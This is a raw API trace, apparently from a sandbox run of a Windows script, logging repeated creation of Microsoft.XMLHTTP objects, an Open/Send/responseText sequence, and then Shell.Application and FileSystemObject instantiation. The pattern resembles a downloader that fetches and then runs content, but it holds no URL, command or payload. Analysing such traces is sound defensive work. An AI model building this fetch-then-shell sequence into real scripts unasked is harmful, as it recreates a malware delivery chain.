	[0808.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0808.885] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0808.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0808.885] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0808.885] SysStringLen (param_1=0x0) returned 0x0
	[0808.885] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0808.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0808.885] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0808.885] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0808.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0808.885] ??2@YAPEAX_K@Z () returned 0x62f330
	[0808.886] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0808.886] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0808.886] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0808.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0808.886] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0808.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0808.886] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0808.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0808.886] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0808.886] SysStringLen (param_1=0x0) returned 0x0
	[0808.886] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0808.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0808.887] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0808.887] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0808.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0808.887] ??2@YAPEAX_K@Z () returned 0x62f310
	[0808.887] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0808.887] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0808.887] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0808.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0808.887] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0808.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0808.887] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0808.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0808.888] longjmp () 
	[0808.888] longjmp () 
	[0808.888] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0808.888] SysStringLen (param_1=0x0) returned 0x0
	[0808.888] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0808.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0808.888] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0808.888] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0808.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0808.888] ??2@YAPEAX_K@Z () returned 0x62f330
	[0808.888] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0808.888] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0808.889] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0808.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0808.889] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0808.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0808.889] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0808.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0808.889] longjmp () 
	[0808.889] longjmp () 
	[0808.889] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0808.890] SysStringLen (param_1=0x0) returned 0x0
	[0808.890] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0808.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0808.890] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0808.890] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0808.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0808.890] ??2@YAPEAX_K@Z () returned 0x62f310
	[0808.890] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0808.890] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0808.890] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0808.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0808.890] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0808.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0808.891] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0808.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0808.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0808.891] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0808.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0814.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0814.164] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0814.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0814.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0814.165] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0814.165] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0814.165] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0814.165] SysStringLen (param_1=0x0) returned 0x0
	[0814.165] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0814.165] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0814.165] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0814.165] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0814.165] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0814.165] ??2@YAPEAX_K@Z () returned 0x62f350
	[0814.166] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0814.166] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0814.166] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0814.166] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0814.166] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0814.166] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0814.166] SysStringLen (param_1=0x0) returned 0x0
	[0814.166] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0814.170] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0814.170] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0814.170] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0814.170] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0814.170] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0814.170] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
